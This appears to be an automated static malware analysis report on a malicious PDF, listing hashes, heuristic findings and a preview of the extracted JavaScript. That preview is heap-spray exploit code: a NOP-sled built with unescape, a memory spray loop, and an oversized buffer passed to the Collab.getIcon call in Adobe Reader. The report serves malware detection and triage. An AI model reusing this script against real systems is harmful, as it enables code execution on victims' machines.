Malicious PDF — malware analysis report

Static analysis result for SHA-256 2c3afc461d766956…

MALICIOUS

PDF

1.5 KB First seen: 2026-05-11
MD5: ae45527c57a79cb4fbf820b2d54cfa9c SHA-1: 03f7ee461c73b2ad71aea88be06b8aa1942b2e92 SHA-256: 2c3afc461d766956d1ac1236561c34e279870ec7a69ccec5ba4c8e33a467ff17
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream, named 'javascript_obj0007_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE heuristic. The document body contains repetitive strings and what appears to be shellcode padding, further suggesting an exploit attempt. The primary intent seems to be the execution of malicious JavaScript, likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    nopblock = unescape("%u9090%u9090");
headersize = 16;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x297 600 bytes
SHA-256: 1362c40e9814be17249f1b3992618d52f7a404a21c476ddc875ea3d1d33ce22e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
while (ggg.length < 0x100)
  ggg += ggg;

ggg += sss + ppp;

nopblock = unescape("%u9090%u9090");
headersize = 16;
acl = headersize + ggg.length;

while (nopblock.length < acl)
  nopblock += nopblock;

fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length - acl);
while(block.length + acl < 0x26000)
  block = block + block + fillblock;

memory = new Array();

for (i=0;i<1024;i++)
  memory[i] = block + ggg;

var buffer = unescape("%10%10%10%1f");

while(buffer.length < 0x6000)
  buffer += buffer;

var ddd = app.doc.Collab
ddd.getIcon( buffer+ 'aaaaD.BBBBBBBB');

Open this report in the interactive analyzer, or submit your own file for analysis.